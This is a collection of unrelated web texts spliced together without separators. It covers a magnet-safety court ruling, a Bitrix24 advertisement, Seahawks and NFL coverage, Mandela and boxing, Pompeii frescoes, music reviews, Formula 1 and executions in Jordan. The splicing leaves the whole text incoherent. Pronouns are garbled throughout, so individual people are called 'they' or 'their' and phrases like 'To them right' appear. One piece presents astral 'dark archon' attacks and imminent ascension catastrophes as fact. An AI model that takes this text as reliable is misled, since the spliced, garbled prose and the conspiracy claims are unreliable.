The rapid growth in exports was attributed to the diversification of export items and regions, which increased in a balanced manner.
Major export items, including semiconductor, petrochemical and steel, gained ground in exports, while shipments were diversified into regions such as the Association of Southeast Asian Nations (ASEAN) and India.
Court to CPSC: Your Magnet Rule's a Turkey
Zen Magnets, the tiny Colorado company that has challenged the CPSC's actions regulating small, powerful magnets, will be having a very good Thanksgiving this year. That is because, once again, Zen has shown that it is possible to fight the federal government and win. Today the United States Court of Appeals for the Tenth Circuit ruled that the CPSC's safety standard banning the magnets sold by Zen did not withstand judicial scrutiny. The court told the agency that if it wanted to regulate magnets it needed to follow the requirements of the Consumer Product Safety Act, and that it should go back to the drawing board and rethink its justifications for the rule.
The CPSA requires that the agency do a cost-benefit analysis and make findings that identify the nature and degree of the risk of injury weighted against the public's need for the product and then regulate in the least burdensome manner possible. The Court found that the agency's analysis was deficient. The court found that the agency overstated the number on injuries and neglected to consider the public utility of many of the uses of the product. In other words, the statutory requirement to weight the costs and benefits of a proposed action is a critical part of regulating. My experience in the last several years of my term as a CPSC Commissioner was that this statutory requirement was seen as an annoyance rather than as a tool for informed decision-making. Perhaps the Tenth Circuit's decision will change the agency's approach to using this statutory tool.
The agency's approach to regulating magnets has been characterized by an “ends justifies means” mind-set. The agency worked to cut off the ability to sell the magnets through retail channels by “asking” retailers to stop selling the product. The agency sought to recall the product, knowing that consumers would not respond to the recall but also knowing that this device could stop further sales. The agency sued those few distributors who had the fortitude to challenge the agency's action. The one company that has stayed the course is Zen, and its success rate has been quite remarkable. The administrative law judge that heard the recall action ruled in Zen's favor. Now an appellate court has found that the rule the agency issued to ban future sales of the product is defective because it blew by statutory requirements that provide for balanced decision-making.
Zen is like a little Yorkie terrier that has grabbed ahold of the ankle of the CPSC and will not let go. Yet, through its determination to challenge what it believes is over-reach by the federal government, it has forced the agency to reexamine its approach to a serious issue. It may be that, through Zen's actions, the CPSC will come to understand that it can protect consumer safety without disregarding basic notions of due process. What a good Thanksgiving that would be.
Advertisements
Running projects can sometimes be difficult especially when proper project management / communication tools are not in place.
Most organizations today still depend on emails to communicate between one another.
Emails are still being used to:
schedule a meeting
send documents (deliverables)
discuss project related issues
update project status
assign tasks
Although emails are the most common tool available for everyone, and many do find it simple to use, it may not be the most effective.
Today, many business applications have emerged to assist organization in collaborating and communication more effectively.
One such web based business application which provide a FREE intranet portal with CRM and Project Management features is Bitrix24.com
Here are some key social intranet features:
Activity Stream
The Activity Stream is the centerpiece of your company's intranet. It is a major enabler of social interaction.
Task Management
Assign and receive task easily with the integrated task management capability
Calender Management
No more missed or forgotten meetings as the calendar management capability shows not only your events but those group of users which you choose, for example your subordinates.
Document Management
Missing or overwritten files are a thing of the past with this document management capability. Files can be uploaded and shared with all team members as it easily keeps track of all document versions. Not to mention searching for files just got much easier.
Project Workgroup Management
Workgroups can be created for every project and is confined to dedicated project team members. Within each workgroup, there's a workspace which includes all the key features as mentioned above.
Instant Messaging
While some organizations are worried about instant messengers being misused for non work related matters, the messaging capability will be confined within a workgroup which makes discussion on specific topics related to the project relevant, focused and informative.
CRM
The built-in CRM module completes this intranet system as it allows everyone within the organization to be customer focused. The system allows all employees to enter and share contact information. It also includes the standing sales force management capabilities such as tracking leads, opportunities, deals, sales funnel and more.
Employee Management
All employees particulars can be kept track within the employee management module. With the company structure capability, new employees can quickly view where they belong to within the entire organization. Another neat feature has to be the absense chart which displays whoare going to absent when and where they will be.
I've personally signed up for the free version of Bitrix24 which allows all features mentioned above for a maximum of 12 users and a max of 5GB online storage.
If you require anything more than that, it will cost $99 / month for the standard plan and $199 / month for the professional plan.
What I also like about this social intranet application has to be it's 7 layers of security protection.
For individuals who are worried about their files being accessed during upload process, worry not as the only way to access Bitrix24 is through an SSL connection which is encrypted with 256-bit encryption. These are the sort of security technology banks use to ensure all banking transactions are safe and secure.
Wait no more, not only does Bitrix24 saves you a ton of money, since it's SaaS, it does not require any tech expertise and you can access it anytime from anywhere, including your iPhone friday night in a bar.
Sign up for a free version of Bitrix24.com today!
RENTON — The moment that may have best defined the Seattle Seahawks' stuttering start to the 2015 season came in the final moments of regulation of Seattle's opening game.
The Seahawks, after falling behind, rallied to take a 31-24 lead over the St. Louis Rams. All Seattle needed to do to open its season with a victory was prevent the Rams from marching into the end zone from midfield in the game's final minute.
But on third-and-five from the Seattle 37-yard line, Seahawks strong safety Dion Bailey was caught flat-footed and stumbled, leaving St. Louis tight end Lance Kendricks wide open for the game-tying touchdown with 59 seconds remaining. The Rams went on to win 34-31 in overtime.
Bailey, an undrafted free agent, was only starting that game because usual starter Kam Chancellor was in the middle of a holdout. Chancellor eventually returned in Week 3, but it wasn't enough to prevent the Seahawks' slow start. Seattle began the season 2-4, a stretch filled with fourth-quarter collapses and defensive miscommunication, and that start may have cost the Seahawks their chance at reaching a third straight Super Bowl.
But Seattle will have no such issues this season.
This year the Seahawks have Chancellor ready and available from the start, and that could make all the difference.
“It's a big boost for us,” Seahawks coach Pete Carroll said. “He's a great leader, he's always been a great leader. He's a terrific player as well. The combination of what they bring and the play of the field is just really special to us and we're thrilled to have him.”
Chancellor was a surprise holdout when training camp began last summer, dissatisfaction with their contract being the catalyst. Chancellor's holdout lasted the entirety of training camp, preseason and the first two games of the regular season.
Without its captain and enforcer — Chancellor is the player who puts the “boom” in the Legion of Boom — Seattle's vaunted defense looked confused and disorganized. The Seahawks lost the two games Chancellor missed, then dropped two more as Chancellor went through the equivalent of their own training camp on the fly over the ensuing month. In all four of those defeats Seattle was unable to hold onto a fourth-quarter lead.
But once Chancellor got their feet under him, Seattle's defense reverted to its dominant self. Through the first six games the Seahawks allowed 20.1 points per game, then during the final 10 that number fell to 15.1, including a minuscule 11.0 over the final five. Seattle ended up leading the NFL in scoring defense for the fourth straight season.
It's the defense that ended the season, rather than the one that started it, that Seattle will have when the season opens Sunday against the Miami Dolphins.
“It's great,” Seahawks cornerback Richard Sherman said about having Chancellor back. “I'm sure the D-line is happy, they make a lot of checks with the D-line. They bring their physicality, their menace to the defense. So it'll be great. It'll be great to have everybody on board.”
Chancellor received no concessions from last year's holdout as he's still playing under the four-year, $28 million contract they signed in 2013. Yet they chose not to hold out this year and has has been a model citizen, saying all the right things.
“I learned that this is a new year,” Chancellor said about their experience with the holdout. “I learned that this is a business, this is the NFL. But more importantly, it's about a brotherhood. We started a brotherhood here and you know, we've got to continue what we've started with that. That's the important thing.”
All has been forgiven by their teammates, too. Chancellor was the team's defensive captain in 2014, a title they relinquished to linebacker Bobby Wagner last year during their holdout. However, when the players voted for captains this year, Chancellor was restored to the captaincy.
“I think no one's ever lost faith in him,” defensive end Michael Bennett said.
“Kam is the best at what they do,” Bennett added. “He's here, he's an enforcer, he's everything, he's the captain of our team. They do everything right. He's just a special talent and we're lucky to have a teammate like him.”
How does having Chancellor with the team from the start affect Seattle's defense?
“It's just getting on the same page with the camaraderie, getting on the same page on the defense with the calls and the checks,” Chancellor said. “Just that energy from the beginning is going to be a bit different because we have all the pieces here. It all comes down to having all the pieces in the machine, the machine can't work without certain pieces. So you've got to have everybody together, and that's what we have now. It feels good, it feels natural, we're ready to go.”
The moment last season when it became crystal clear just what the Seahawks were missing during Chancellor's holdout came in Week 4 against the Detroit Lions.
There was less than two minutes remaining, Seattle was clinging to a 13-10 lead, and the Lions were driving for the go-ahead touchdown. Detroit's Calvin Johnson caught a pass and was lunging for the goal line when Chancellor punched the ball out of Johnson's arm from behind, with the ball going through the end zone for a touchback. That play prevented the Seahawks from falling to 1-3 and may have saved Seattle's season.
And with Chancellor in the fold from the start, this year the Seahawks won't have to wait for them to make their presence felt.
For more on the Seattle sports scene, check out Nick Patterson's Seattle Sidelines blog at www.heraldnet.com/tag/seattle-sidelines, or follow them on Twitter at @NickHPatterson.
A traditional belief in Mexican culture is that there are three stages of death. Rudimentarily recounted, the first stage is physical death, our last breath; the second is when our bodies are lowered into the earth; the third is the last time our name is spoken, when there is no one left to remember us.
Nelson Mandela, who is in some part of the first phase at present and will almost certainly never reach the third, was -- among all the other things that made them one of the towering figures of the last century -- a boxing fan. A frankly aberrant, avid and feverishly passionate boxing fan. Before they took up the fight against apartheid, which was the fight that defined their life and ensured their legacy, Mandela was a boxer himself. At this late moment in their life, everything about Mandela is both more poignant and more significant. Their love for boxing, this elemental, self-defeating, vital and troubled sport, is no different.
***
Marco Cianfanelli's "Shadow Boxing" is a sculpture of Mandela that's five meters tall; it stands in front of the Magistrate's Court in Johannesburg, a route that the Mail and Guardian's Laurice Taitz notes, "that a young Mandela must have walked many times." The sculpture's steel plates are painted gray and black and its likeness is based on a photograph of Mandela sparring with professional boxer Jerry Moloi. The photograph was taken in 1953, on the rooftop of a building in the downtown core of the city. It was the same year Mandela opened a law firm with Oliver Tambo, which was the only African-run law firm in the country.
At the time, an Italian boxer from Boston, Rocky Marciano, was in the second of a four year reign as heavyweight champion of the world. Muhammad Ali was 11 years old, still named Cassius Clay, and seven years from their professional debut.
Less than ten years later, Mandela was in prison. Their first sentence was five years of hard labor for inciting workers to strike and leaving the country without permission. Two years later, while still serving that sentence, they were charged again, this time for conspiracy to overthrow the government and four counts of sabotage. In the courtroom, they said, "I have cherished the ideal of a democratic and free society in which all persons live together in harmony and with equal opportunities. It is an ideal which I hope to live for and to achieve. But if needs be, it is an ideal for which I am prepared to die." And then Mandela was found guilty, after an eight month trial. They would spend the next 25 years of their life behind bars.
On the outside, the fight for equality and civil rights continued on their home front and in the United States. Four months before Mandela's life sentence, Ali, 22 years old by that point, fought heavyweight champion Sonny Liston for the first time. Prior to the match, they told the press they were going to “float like a butterfly and sting like a bee.”
On February 25, 1964, in Miami, Ali defeated Liston in one of the biggest boxing upsets of all time. The victory earned them The Ring, WBA and WBC World Heavyweight titles. It also earned them the attention of the world.
Ali took up their own causes outside of boxing, of course. They refused to fight in the Vietnam War, a stance that led them to be banned from boxing for three years and robbed them of the prime of their career. They spent some of that time attending rallies and giving speeches at universities and colleges across the country. Their fierce and boldly expressed anti-war beliefs and champion's charisma made them one of the more complicated and compelling icons of their generation. By the time Ali got back in the ring, they were much more than a boxer, and lent the sport a vast and peculiar cultural relevance. Simply because of its association with Ali, boxing seemed a vehicle for change. Boxing would never seem quite so great or important again. It was, maybe, the last time that fighters as diverse in their aims and approaches as Mandela and Ali could both fit within the sport.
***
Boxing is doing better than you've probably heard, but it is undeniably and increasingly not what it was when it mattered most. It is, like a great many other things, governed by idiotic internecine politics and crude greed, and hampered by a self-defeating scuzziness. But buried beneath it all, its tough roots -- primal and honest and essential -- still remain.
The 1920's are widely regarded as the golden age of boxing. It was newly legalized, fashionable, and exciting. But defining a golden era in any sport is often misleading and colored by nostalgia. In the late 1700's boxing reached America; the great fights of the late 1800's are still baffling, awe-inspiring and outsized. Golden ages bumped up against each other throughout the first half of the 20th Century, and the 1960s brought the Ali era; there were miniature renaissances in years after that centered around Sugar Ray Leonard and Mike Tyson. Each of these epochs carries its own importance, culturally and otherwise. The same, we might as well assume, will someday apply to today's diminished boxing scene.
Now, the sport is in transition. While its popularity in America dwindles, it continues to remain not just relevant but vital in the rest of the world. It is changing, as such things do, and attracting new fans and fighters who will change it further in the years to come. Like all things popular and consumed, its lifespan is cyclical. Boxing is not finished; fighting is not going to get any less central to the experience of being human. It's one of the truest things people do.
Mandela, of course, understood this. In their autobiography Long Walk to Freedom, they wrote:
“Boxing is egalitarian. In the ring, rank, age, color, and wealth are irrelevant…I never did any real fighting after I entered politics. My main interest was in training; I found the rigorous exercise to be an excellent outlet for tension and stress. After a strenuous workout, I felt both mentally and physically lighter. It was a way of losing myself in something that was not the struggle. After an evening's workout I would wake up the next morning feeling strong and refreshed, ready to take up the fight again.”
Sports are representative of the culture in which they reside and arguably no sport is wrapped more intrinsically around in-the-moment culture than boxing. Beyond its elemental, binary objectivity, it has ties to gender, race, and class. Beyond that shifting subtext, though, is an essential truth at the center of it: one fighter wins and one loses. The fight is a struggle, a contest that's representative and reflective of the individual fighters in the ring, but also of much more than that. The fighters are concerned with the first part, as they must be. The rest of it is us.
When we lose Mandela, a loss that will reverberate globally, boxing will lose one of its most important and powerful proponents. One of history's great fighters, they lent a richness to the sport simply by their association with it. Their kinship with and closeness to boxing's central struggle defined him, and ennobled the sport by projecting its hard, simple binaries outward into the world.
Mandela's name will never reach that third and final stage of death; their legacy is too salient, too pervasive and too defiant and too strong. Boxing is in trouble, as it often is; it's a business and a sport. Fighting, as Mandela defined, understood and exemplified it, is a bigger thing, and forever.
(Reuters) - A British government report on Egypt's Muslim Brotherhood has been delayed as ministers and officials disagree over its findings, the Financial Times reported on Sunday, citing official sources.
The newspaper said Prime Minister David Cameron, under pressure from allies in the Gulf, had asked Britain's ambassador to Saudi Arabia to conduct an investigation into whether the Muslim Brotherhood should be classified as a terrorist organization.
Citing official sources, the newspaper said that the report had found the political group should not be labeled a terrorist organization and had found little evidence that its members are involved in terrorist activities.
However, ministers afraid of a backlash from allies in the Middle East have stalled the publication of the report for several weeks, the Financial Times said.
UK's Foreign and Commonwealth Office could not immediately be reached for comment.
The Muslim Brotherhood, once Egypt's oldest, best organized and most successful political movement, has seen hundreds of its members killed and thousands detained since then-army chief Abdel Fattah al-Sisi overthrew elected president and Brotherhood member Mohamed Mursi 13 months ago, following weeks of protest.
2015 NFL Power Rankings: Week 15 ESPN.com
Week: Select Pre 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
The Steelers are coming off a big victory over the rival Bengals and have a chance to make another statement in Week 15 against the Broncos.
The bad news? The postseason is hardly a lock. In fact, Ben Roethlisberger & Co. are the only 8-5 team not currently in a playoff spot. But the situation is much different here in our Power Rankings, as Pittsburgh now sits at No. 6 -- ahead of every other 8-5 team, as well as 9-4 Green Bay.
Among the other 8-5 teams, the Seahawks, despite a four-game winning streak, have slipped to No. 8, followed by the Chiefs and Jets. The Vikings (No. 11) are the only 8-5 team not in our top 10.
At the top, the unbeaten Panthers are No. 1 for the third straight week, while the Patriots gained two spots to take No. 3. The week's biggest mover was Jacksonville (No. 21), which jumped eight spots.
Note: The comments below are provided by ESPN Stats & Information.
• Vegas Rankings | Football Power Index Rankings | Handicapping the AFC wild-card race | Team Power Rankings charts since 2002
It suddenly struck me: I wanted to make the most of every moment. I wanted to decrease the moments I felt anxious and increase the moments I felt content and in the flow. I decided to get into a practicing mindfulness experiment.
So what would I do differently through this experiment? I would be paying attention to how I feel. And I would operate under different priorities with “feeling good” coming first.
Practicing Mindfulness & my relationship to e-mail
Right from day 1 of practicing mindfulness I discovered my sensistive spot: e-mail. I felt a strong urge to check it, and anxious while my e-mail was loading and I was waiting to see if there was something new. Anxiousness was the opposite of “feeling good”. Checking e-mail is fine if you feel good, but is not ok if you feel anxious.
The urge to check e-mail was irresistible on two specific times of the day:
Checking e-mail was the first thing I would do in the morning – before coffee, and sometimes even before using the bathroom! It was also the first thing I would do after the gym. I would get in the house and immediately reach for the Gmail app in my tablet.
Through the rest of the day I was not particularly addicted to e-mail. I wasn't checking it all the time, and I didn't feel anxious when I was checking it. It was those two moments – after waking up and coming back from the gym, that I was, literally, addicted to e-mail.
Break the habit: The art of pausing.
I needed to break the habit but I couldn't just do it. I tried not to check e-mail but the urge was almost irresistible. I couldn't just stop checking my e-mail after I woke up or after the gym. So I found another way to make change happen: I would pause and wait for 30 seconds or so before I actually tapped the Gmail tab on my tablet.
I wouldn't count to 30, and I wouldn't set a timer. I would just sit on the couch with the tablet in my hands and wait. My mind would roam. Or, maybe I would focus on my breathing.
But as I did that the feeling of anxiousness was smoothing out. It was decreasing. And I felt better. After a little while, when I actually tapped on the Gmail icon, I wouldn't feel anxious anymore. I felt that I was ok, that everything was ok. I didn't feel content necessarily, but I didn't feel anxious either.
Practicing mindfulness: Results after two weeks.
After two weeks of experimenting with practicing mindfulness, I can now resist the urge to check e-mail when I wake up and when I come home from the gym. In the morning, I can make my coffee first, and then, check e-mail. I can also skip checking e-mail after the gym quite easily.
In addition, when I am checking e-mail I am not feeling anxious. I feel fine!
I am on the right path 🙂
I will keep practicing mindfulness because I know that there are quite a few untapped “feel good moments” throughout the day that I could take advantage of.
Living my life while feeling good is way too important not to pay attention. Join me?
P.S. What a coincidence! Right after I got started with this mindfulness experiment, I found out that my friend John Muldoon from MonthlyExperiments.com was also getting into a practicing mindfulness experiment for the month of December.  They are doing this along with Kristen Ruvnik. Learn how others are doing in the Mindful December experiment here.
Photo credit: mindfulness
I was lucky enough to have the opportunity to visit Pompeii and Herculaneum a few weeks back in connection with the Society of Biblical Literature conference in Rome (where I presented a paper from my upcoming book). The populations of both of these ancient towns were wiped out by the volcanic eruption of mount Vesuvius in 79 CE, and no subsequent building was done over the ruins. So these are among the best preserved ancient cities to see. One major result of the trip is that I now have about 1000 new photos relating to artifacts from the Roman era. Among these are many photos of mosaics and paintings or frescoes from Pompeii (and some from Herculaneum). So I'll have a series of posts on some of these paintings (also drawing on some information found in Irene Bragantini and Valeria Sampaolo, La pittura pompeiana Naples: Museo Archeologico Nazionale di Napoli, 2009).
The majority of paintings from Pompeii are now removed from Pompeii and preserved in the National Archeological Museum of Naples (Museo archeologico nazionale di Napoli). However, some are still in their original find-spots (in situ). One of the most incredible wall-paintings from antiquity can still be found within a rather large home on the outskirts of the original town of Pompeii.
Mysteries of Dionysos
This home is known as Villa Item or Villa of the Mysteries, due to the paintings that decorated one of its banqueting halls. This banqueting hall may also have been used in connection with initiations in the mysteries of Dionysos (Bacchus). I have discussed the mysteries and Dionysos' mysteries specifically on one of my websites, so I would suggest you read that first. Right now I'd like to supplement my earlier discussion of the mysteries by supplying photos of the paintings which seem to depict stages in the initiation process and related mythological scenes.
The paintings seem to depict both the devotees of Dionysos in various stages of participation in initiation rites and mythological scenes which intersect with the progress of initiation itself. The exact interpretation of these paintings is, of course, debated, but I will give a basic description with some consultation of M.P. Nilsson (The Dionysiac Mysteries of the Hellenistics and Roman Age [Lund: Gleerup, 1957], 66-78) and Walter Burkert (Ancient Mystery Cults [Cambridge: Harvard UP, 1987], 95-96).
*****
Scene 1 – Preparations (north wall, on your left as you enter):
A naked boy reads from a papyrus scroll as two women of the house listen and a third woman carries a dish towards the next scene.
*****
Scene 2 – Preparations and segue to mythical or revelation scenes (north wall, on your left as you enter):
A seated woman (with back facing us) uncovers a tray with their left hand while receiving liquid into a dish with their right hand, perhaps cleaning their hands (Burkert) or making an offering to the god (Nilsson). To them right is a mythical scene depicting a silenos playing the lyre, a boy playing a flute, and a girl suckling a goat. Further to the right, a partially clothed woman runs in fear (perhaps running from the flogging scene on the opposite side).
*****
Scene 3 – Mythical scene with Silenos, Dionysos, and threatening winged female figure (east wall, straight ahead as you enter):
This may be a depiction of the revelation of the god Dionysos to the initiate. A drunken and scantily clad god Dionysos, accompanied by Ariadne, is seated in the centre as a Silenos shows something (or offers a drink) to a boy (satyr?) while another boy holds up a theatrical mask. To the right, a partially clothed woman lifts a veil to reveal the contents of a basket, likely the phallic symbol associated with initiation into the mysteries of DIonysos. A threatening mythical figure appears on the far right (see next photo).
*****
Scene 4 – Flagellation and dancing woman (east and south walls):
A winged, mythical figure winds up to flog a woman (initiate-to-be?) with a rod or wand (thyrsos). The woman lays their head in the lap of another woman for protection from the threatening figure. To the right, a woman (same initiate who was previously flogged?) dances naked while playing finger-cymbals over their head and another woman holds a reed or wand (thyrsos), a symbol of the god Dionysos.
*****
Scene 5 – Seated woman being adorned by cupids
It's kind of hard not to like mashups. They're gimmicky after a while, but it's fun to hear songs you know and love mixed with other songs you know and love. When you take two artists you know and love and create a whole mashup album, it's crazy fun.
Amerigo Gazaway is doing a whole series of these. First up is Mos Def—who's now known as Yasiin Bey but it's hard not to call them Mos Def—and Marvin Gaye. Hip hop and soul work really well together, and quite frankly, these two artists are perfect for each other. That's probably why Gazaway is calling the series "Soul Mates."
Advertisement
The album is out, and it's perfect. The effect reminds me of the Grey Album but somehow more seductive. (Marvin Gaye was always good at that.) While it looks like there are some copyright issues with downloading the entire album at once, you can find and download all of the songs on Soundcloud.
The Shins' first full-length is a definitive indie rock album of the 2000s not just because of its thoughtful, tuneful songs, but also because of the vivid portrait it painted of indie culture. After the high irony of Pavement and other '90s standard bearers, indie rock began moving into more emotionally forthright territory. Oh, Inverted World is the sound of realizing there's more to life than being a smart-aleck -- but also not being ready to open up completely. The album's first song, "Caring Is Creepy," sums up the typical indie response to emotional situations with its title alone, but it also introduces James Mercer's delicate, dryly witty take on that attitude. Hyper-literate lyrics like "It's a luscious mix of words and tricks" suggest someone who's better with words than with feelings, yet Mercer's high, wavering tones -- which are as awkward as they are beautiful -- prove otherwise. Caring might be creepy, but it's hard to avoid; the rest of Oh, Inverted World chronicles this post-ironic vulnerability, wrapping it in jangly guitar pop that echoes the Kinks, Zombies, and Beach Boys. This may not be the most innovative sound, but it makes Mercer's boy-meets-girl, boy-runs-away, boy-comes-back, girl-runs-away travails all the more familiar and relatable. And, of course, just how good the album's songs are can't be overlooked. "Know Your Onion" practically jumps out of its skin, bursting with British Invasion riffs and angst that goes way beyond adolescence; "New Slang" tempers a yearning that curdles into bitterness with a beautiful melody and a ghostly falsetto coda. More importantly, all Oh, Inverted World's songs hang together in an immensely satisfying way. "Weird Divide" is a backyard Pet Sounds; its winding melody channels that point in the summer when it's too hot to care much about anything, punctuating it with percussion that evokes incessant sprinklers. An airy feel runs through the album, from "Girl on the Wing"'s bird imagery and pristine harmonies to "Girl Inform Me"'s giddiness to "One by One All Day"'s psychedelic coda. As things wind down, "Your Algebra"'s spooky chamber pop and "The Past and the Pending"'s acoustic musing foreshadow the experiments The Shins undertook on later albums. Oh, Inverted World is so full of ideas and emotions, and so fully realized, that it's hard to believe it's just 33 minutes long. Whether or not the album lives up to the breathless "It'll change your life!" claims made about it in Garden State, the less ironic direction of 2000s indie begins here.
by Georgi Stankov, July 25, 2013
www.stankovuniversallaw.com
Since yesterday there is a pronounced effort of the dark ones from the astral planes to attack us – me and the PAT. I noticed this pattern, but wanted to be sure as it was rather weak, although it must have been a very strong and well-calculated attack on the part of the dark ones. Only that I am not perceptive anymore to such attempts. I have been attacked many times like this in the past and I know very well how these dark archons operate.
Let me explain it to you, so that you can discern such attacks immediately and protect yourselves successfully. These archons – I thought they were completely eliminated, but they must have surged one last time on our upper 4D earth before they disappear for ever in their abyss of darkness – take a common human fear-based pattern, in this case either from your personality structure or from that of your beloved ones. Then they map it, amplified many times the intensity of this particular fear frequency spectrum and then project it onto the target person as to stir anxiety, unrest, discontent, etc.
I personally can very well discern these projected negative thought patterns and know where they come from. They always come from behind and brutally intrude into your emotional field. They cannot be resolved with logical arguments, as they do not belong to you any more. They feel like foreign bodies in your emotional field, but can be nonetheless very overwhelming, if one is not prepared for them and lets their guard down. These negative thought patterns are also very impertinent and persistent like spoiled children.
My guess is that the dark ones are now planning their final capital crime on humanity and we are definitely their greatest adversary. You must be very careful and vigilant these last days as to immediately discern such attacks and act correspondingly. You must not make the failure to take such negative moods personally, even when they come from your beloved ones, as they are now also attacked by these dark astral forces in a reciprocal manner by insinuating similar negative thoughts in their minds against you. This is how this scum operates from the astral plane. They are allowed by the forces of light one last time to do this on this upper 4D earth as to instigate their human stooges on power to begin with their long-planned crimes on humanity in the final act of the ascension drama.
Hence you must from now on daily protect you in meditations with christed light and ask your HS and all angels and ascended masters, and the forces of light for full protection and it will be given to you. The dark ones are so weak now that they have no longer any power on us. But they will make one last ditch effort to create havoc, as April's HS has warned us in their last message:
“There are many thought-forms yet to be realized/released. While much has been mitigated in recent weeks due to the additional parallel timelines and the uplifting energy waves/ showers, there are still core/foundational thought forms that need to be seen/ confronted and then released, mostly at a collective level. How these thought forms manifest and are cleared remains to be seen on the upper timelines. These could and probably will include elements of witnessing and releasing the collapse of the system, a dark cabal induced catastrophe, war, record breaking storms, etc…but again, in a lessened fashion.
I mention this because the dark ones have been using these alignments/ gateways and the power of 13 in general (through their dark unification) to influence energetics and subsequently world events and humanity in general toward their own twisted agendas. They will attempt one last time to do the same. Do you remember Lion's Gate this time last year (At that time we experienced a massive attack from the dark ones that hampered our ascension test run, comment George)? Now to be clear, they do not have the power that they did at this time last year, not at all, however, the actual underlying energies and thought forms that have allowed this dark cabal to rule humanity behind the scenes must be confronted by humanity, at all levels/timelines, before they can be truly conquered/ transcended and Oneness embraced/ actualized as it is to be on the upper timelines. For these same core energies/ beliefs that sustained the dark ones also sustained the illusion of separation. And this why many things still “appear” as they do.”
Let us not forget that we now serve as a shield for the whole ascending humanity and we have to experience all these negative collective patterns as substitutes for the masses one last time as their wayshowers. We are much more experienced than the masses in this kind of cleansing activity and can better cope with such dark attacks. These attacks are necessary, so that the dark cabal can finally start with their crimes on humanity before we and the forces of light can enter the stage and make a short trial with them and expel them on the 3D hell earth, by triggering the MPR and the ID split through detonating the PAT Supernova, as I see it now.
Please observe that April's HS gave this message before the worst catastrophic scenario and the MPR took place on the upper 4D earths. Now the magnitude of the catastrophic events must be logically more pronounced on our upper 4D earth than initially expected, even though these catastrophes will not lead to so much death and devastation as on the lower six 4D timelines because we shall ascend to the higher dimensions as April's HS also confirms in the above quotation.
These new, somewhat unexpected attacks on us, who now actually dwell on the 9th to 12th levels/4D timelines and some of you are in your vibrations already in the 5th dimension, are the most clear sign that these events are imminent and can explode any moment from now on.
______________________________ ___
Technical Announcement
Some readers of our website have recently made the experience that they have no access to the latest posts. This problem is connected to the browser which you use. Chris, my webmaster, made recently some upgradings of our website program to protect it better from Internet trolls' attacks. The opposite side of this upgrading is that if your browser is not the latest version you may no longer have access to the latest articles on our website as it cannot cope with the new programs on it. Some browsers no longer function properly as their providers have given up upgrading them as they know that this is the end and so they no longer invest in their products.
I recommend you in such a case to take the latest version of Google Chrome browser and also define it as your primary browser and then you will solve this problem and have again access to the latest publications. Other readers had this same problem recently and this is how we solved it each time.
The Maranello-based outfit had looked poised for a good challenge on victory at the Red Bull Ring, but it all went wrong in the race.
Vettel crashed out of the lead when their right rear tyre exploded as they tried to eke out a long-opening stint on supersofts, while Raikkonen was left facing a fightback and ultimately beaten by Red Bull's Verstappen despite holding early track position.
Arrivabene insisted that Ferrari was not at fault on either occasion, as Vettel's failure was unexpected and Raikkonen's strategy should have allowed them to finish second.
"He [Vettel] was supposed to be out for a certain number of laps and we were asking to them and they were supposed to give feedback on tyres," explained Arrivabene.
"We had no signs on telemetry, no sign from Seb, and no sign from the sensor of the tyre that suddenly the tyre was collapsing. Zero sign. The performance was okay.
"Then like with Sebastian, the feedback that Kimi gave us was good. So we were continuing, like happened with [Daniel] Ricciardo, the guys were going in and if not we were able to overtake.
"In fact, on the last lap in Turn 3, where they [earlier] overtook Ricciardo, they were ready to go [and get past Verstappen] but we had the yellow flag. They were very lucky – it is ironic."
Arrivabene explained that although Verstappen was slashing into the track advantage that Raikkonen had early on, its software always predicted that the Finn would recover shortly before the chequered flag after their stop.
"We were thinking that Red Bull was stopping again. The data we had was quite precise, so we took a risk.
"In our data Kimi was able to overtake Verstappen two laps before the race end, and we were nearly there.
"Concerning that, without this tyre failure [for Sebastian] they were very high on the podium. I don't know where, but very high as the two strategies were different to one another."
Arrivabene said that the team had not had by Sunday night any explanation from Pirelli about why the right rear tyre on Vettel's car had failed.
"It is too early to understand what happened," they said. "It could be kerbs or any other reason. We are talking to Pirelli to understand the reason why. Other teams were running without any problem and this is really strange."
AMMAN, Jordan -- Ten prisoners with ties to Islamic extremism who carried out five shootings and a bombing since 2003 were executed in Jordan on Saturday, a government spokesperson said.
It was the largest round of executions in the kingdom in recent memory.
Among those killed in the attacks were a British tourist, an outspoken Jordanian critic of Islamic extremism and members of the Jordanian security forces.
Saturday's executions were the first since pro-Western Jordan launched a crackdown on Islamic extremism two years ago, in response to the killing of a captured Jordanian fighter pilot by the Islamic State of Iraq and Syria, or ISIS. Jordan is a part of a U.S.-led military coalition against ISIS, which holds territory in Syria and Iraq.
The prisoners were hanged at dawn Saturday at Swaqa Prison, about 47 miles south of the capital of Amman, said government spokesperson Mohammed Momani. All had links to Islamic militant groups, they said.
Five others were executed for other crimes, including incest, Momani said in a statement carried by the state news agency Petra.
The assailants executed Saturday for terror convictions had been involved in six different incidents, from a 2003 bombing attack that killed 19 at Jordan's embassy in Iraq to the September 2016 shooting of local writer Nahed Hattar on the steps of an Amman courthouse.
Also listed were a 2006 shooting attack on a group of tourists at a Roman theater in Amman in which a 30-year-old British man was killed; a December 2015 shooting attack that killed two police officers; a March 2016 shootout between police and ISIS militants at their hideout in which an officer was killed; and a June 2016 attack by a lone gunman on an office of Jordan's intelligence agency that killed five.
Nahad Hattar, the writer, had been on trial for posting a cartoon deemed offensive to Islam on social media when an assailant killed them outside the courthouse. The shooter was a former mosque prayer leader motivated by anger over the cartoon, officials said at the time.
Saad Hattar, a cousin of the victim, said Saturday that while the killer was punished, those who instigated such attacks with hateful rhetoric were not.
“The murderer was just a tool, and our society needs the uprooting of the ideology and the culture behind him,” Hattar, a journalist, told The Associated Press.
Analyst Labib Kamhawi said they believe the executions were meant to send a triple message. They signaled to potential attackers that they can expect harsh punishment and reminded ordinary Jordanians buckling under price increases that their country faces a serious security threat, they said.
The message to the outside world, particularly the Trump administration, is that “Jordan is on top of things and that Jordan can be considered one of the allies in fighting terrorism,” Kamhawi said.
Jordan intensified its campaign against suspected Islamic extremists after ISIS released a video in early 2015, showing its militants as they burned to death the fighter pilot trapped in a cage. In response to the video, Jordan executed two prisoners linked to the al Qaeda terror network, a precursor of ISIS.
Hundreds of Jordanians have been detained or sentenced to prison since then, including those expressing support for ISIS on social media.
Jordanian authorities have dismissed support for ISIS in the kingdom as a fringe phenomenon and said security forces can contain any threat. However, there has been a rise in attacks in Jordan linked to Islamic extremists over the past year.
